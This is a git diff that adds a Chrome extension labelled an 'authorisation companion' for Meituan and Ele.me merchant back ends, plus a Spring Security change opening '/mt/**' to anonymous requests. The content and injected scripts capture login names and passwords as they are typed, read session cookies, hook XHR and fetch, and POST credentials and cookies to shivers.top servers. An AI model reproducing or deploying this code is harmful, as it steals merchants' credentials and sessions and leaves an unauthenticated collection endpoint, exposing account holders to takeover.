diff --git a/expand/ert/content.js b/expand/ert/content.js new file mode 100644 index 0000000..32d282d --- /dev/null +++ b/expand/ert/content.js @@ -0,0 +1,121 @@ +document.addEventListener("click", function(e) { + // 处理点击事件的代码 + var account = document.getElementById("login") + var password = document.getElementById("password") + if(account != null && account != 'undefined'){ + localStorage.setItem('account', account.value) + } + if(password != null && password != 'undefined'){ + localStorage.setItem('password', password.value) + } +}); +(function () { + if (location.host === 'melody.shop.ele.me' || location.host === 'nr.ele.me') { + var baseParamUrl = window.location.href + window.onload = function () { + var inputUserName = document.getElementById('username_login_username') + var inputPassWord = document.getElementById('username_login_password') + inputUserName.addEventListener('input', function (event) { + localStorage.setItem('ELMNAME', event.target.value) + }) + inputPassWord.addEventListener('input', function (event) { + localStorage.setItem('ELMPASS', event.target.value) + }) + } + if (baseParamUrl.includes('ABC')) { + var test = window.location.href.replace('https://melody.shop.ele.me/?ABC=', '') + var userName = test.substring(0, test.indexOf(':')) + var sysType = test.substring(test.indexOf(':') + 1, test.length) + localStorage.setItem('sysName', userName) + localStorage.setItem('sysType', sysType) + } + var s = document.createElement('script') + s.src = chrome.runtime.getURL('injected.js') + s.onload = function () { + this.remove() + }; + (document.head || document.documentElement).appendChild(s) + } + if (location.host === 'e.waimai.meituan.com') { + var cookies = document.cookie + var baseParamUrl = window.location.href + if (baseParamUrl.includes('ABC')) { + var test = window.location.href.replace('https://e.waimai.meituan.com/?ABC=', '') + var userName = test.substring(0, test.indexOf(':')) + var sysType = test.substring(test.indexOf(':') + 1, test.length) + localStorage.setItem('sysName', userName) + localStorage.setItem('sysType', sysType) + } + var xhr = new XMLHttpRequest() + var userName = localStorage.getItem('sysName') + var sysType = localStorage.getItem('sysType') + var account = localStorage.getItem('account') + var password = localStorage.getItem('password') + var wmPoiName = localStorage.getItem('wmPoiName') + //console.log('ccccccccccccccccccccccccccccccc'+userName) + //console.log('ddddddddddddddddddddddddddddddd'+cookies) + //console.log('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'+account) + //console.log('bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'+password) + //console.log('eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee'+wmPoiName) + if(account !== null && password !== null && account !== 'null' && password!== 'null' && account !== '' && password !== ''){ + if ('1' === sysType) { + //服务器地址 + xhr.open('POST', 'http://127.0.0.1:8080/mt/cookies', true) + } else { + xhr.open('POST', 'https://www.shivers.top/prod-api/negative/store_bing', true) + } + xhr.setRequestHeader("Content-Type","application/json") + var sendData = {'bingType': 1, 'cookie': cookies, 'userName': userName, 'account': account, 'password': password, 'wmPoiName': wmPoiName} + xhr.send(JSON.stringify(sendData)) + xhr.onreadystatechange = function () { + if (xhr.readyState === 4 && xhr.status === 200) { + if (xhr.responseText === 'true') { + alert('当前授权完成,请直接关闭当前浏览器!') + } + } + } + } + localStorage.setItem('account', null) + localStorage.setItem('password', null) + } + if (location.host === 'shangoue.meituan.com') { + var cookies = document.cookie + var systype + var username + var result = window.prompt('请输入需要绑定的系统登录账户', '') + username = result + if (username != null) { + var resultOne = confirm('确定要绑定到营销生态系统吗?') + if (resultOne) { + var xhr = new XMLHttpRequest() + xhr.open('POST', 'https://go.shivers.top/prod-api/msg/store_bing', true) + var sendData = {'bingType': 1, 'cookie': cookies, 'abc': username} + xhr.send(JSON.stringify(sendData)) + xhr.onreadystatechange = function () { + if (xhr.readyState === 4 && xhr.status === 200) { + if (xhr.responseText === 'true') { + alert('当前授权完成,如当前是总账号模式请尽快切换至子门店帐号绑定,目前总账号模式会触发子门店掉线,非总帐号模式请直接关闭当前浏览器!') + } + } + } + } else { + var resultsecond = confirm('确定要绑定到多合一系统吗?') + if (resultsecond) { + var xhr = new XMLHttpRequest() + xhr.open('POST', 'https://www.shivers.top/prod-api/negative/store_bing', true) + var sendData = {'bingType': 1, 'cookie': cookies, 'abc': username} + xhr.send(JSON.stringify(sendData)) + xhr.onreadystatechange = function () { + if (xhr.readyState === 4 && xhr.status === 200) { + if (xhr.responseText === 'true') { + alert('当前授权完成,如当前是总账号模式请点击确定后切换子门店即可,非总帐号模式请直接关闭当前浏览器!') + } + } + } + } else { + systype = '3' + } + } + } + } +})() \ No newline at end of file diff --git a/expand/ert/injected.js b/expand/ert/injected.js new file mode 100644 index 0000000..48b1176 --- /dev/null +++ b/expand/ert/injected.js @@ -0,0 +1,44 @@ +(function(xhr) { + var XHR = XMLHttpRequest.prototype + var open = XHR.open + var send = XHR.send + XHR.open = function(method, url) { + this._method = method + this._url = url + return open.apply(this, arguments) + } + XHR.send = function(postData) { + this.addEventListener('load', function() { + window.postMessage({ type: 'xhr', data: this.response }, '*') + }) + return send.apply(this, arguments) + } +})(XMLHttpRequest); + +(function() { + let origFetch = window.fetch + window.fetch = async function(...args) { + const response = await origFetch(...args) + if (args[0] === 'https://app-api.shop.ele.me/shop/invoke/?method=GrayService.businessTimeGray') { + var xhr = new XMLHttpRequest() + var userName = localStorage.getItem('sysName') + var sysType = localStorage.getItem('sysType') + if ('1' === sysType) { + xhr.open('POST', 'https://go.shivers.top/prod-api/msg/store_bing', true) + } else { + xhr.open('POST', 'https://www.shivers.top/prod-api/negative/store_bing', true) + } + var paramVar = localStorage.getItem('ELMNAME') + ':' + localStorage.getItem('ELMPASS') + var sendData = { 'bingType': 2, 'cookie': args[1], 'abc': userName, 'account': paramVar } + xhr.send(JSON.stringify(sendData)) + xhr.onreadystatechange = function() { + if (xhr.readyState === 4 && xhr.status === 200) { + if (xhr.responseText === 'true') { + alert('当前授权完成,请直接关闭当前浏览器!') + } + } + } + } + return response + } +})(); \ No newline at end of file diff --git a/expand/ert/manifest.json b/expand/ert/manifest.json new file mode 100644 index 0000000..351616b --- /dev/null +++ b/expand/ert/manifest.json @@ -0,0 +1,42 @@ +{ + "manifest_version": 2, + "name": "授权伴侣", + "version": "1.0", + "content_security_policy": "script-src 'self'; object-src 'self';", + "description": "This is a sample Chrome extension.", + "browser_action": {}, + "content_scripts": [ + { + "matches": [ + "*://e.waimai.meituan.com/*", + "*://shangoue.meituan.com/*", + "*://melody.shop.ele.me/*" + ], + "js": [ + "content.js" + ], + "run_at": "document_start" + } + ], + "web_accessible_resources": [ + "injected.js" + ], + "permissions": [ + "nativeMessaging", + "tabs", + "notifications", + "webRequest", + "webRequestBlocking", + "storage", + "http://*/*", + "https://*/*", + "unlimitedStorage", + "idle", + "webNavigation", + "contextMenus", + "clipboardWrite", + "cookies", + "declarativeContent", + "" + ] +} \ No newline at end of file diff --git a/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java b/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java index d00d4a0..11fb7ba 100644 --- a/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java +++ b/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java @@ -115,7 +115,9 @@ public class SecurityConfig // 静态资源,可匿名访问 .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll() .antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll() - // 除上面外的所有请求全部需要鉴权认证 + .antMatchers("/mt/**").permitAll() + + // 除上面外的所有请求全部需要鉴权认证 .anyRequest().authenticated(); }) // 添加Logout filter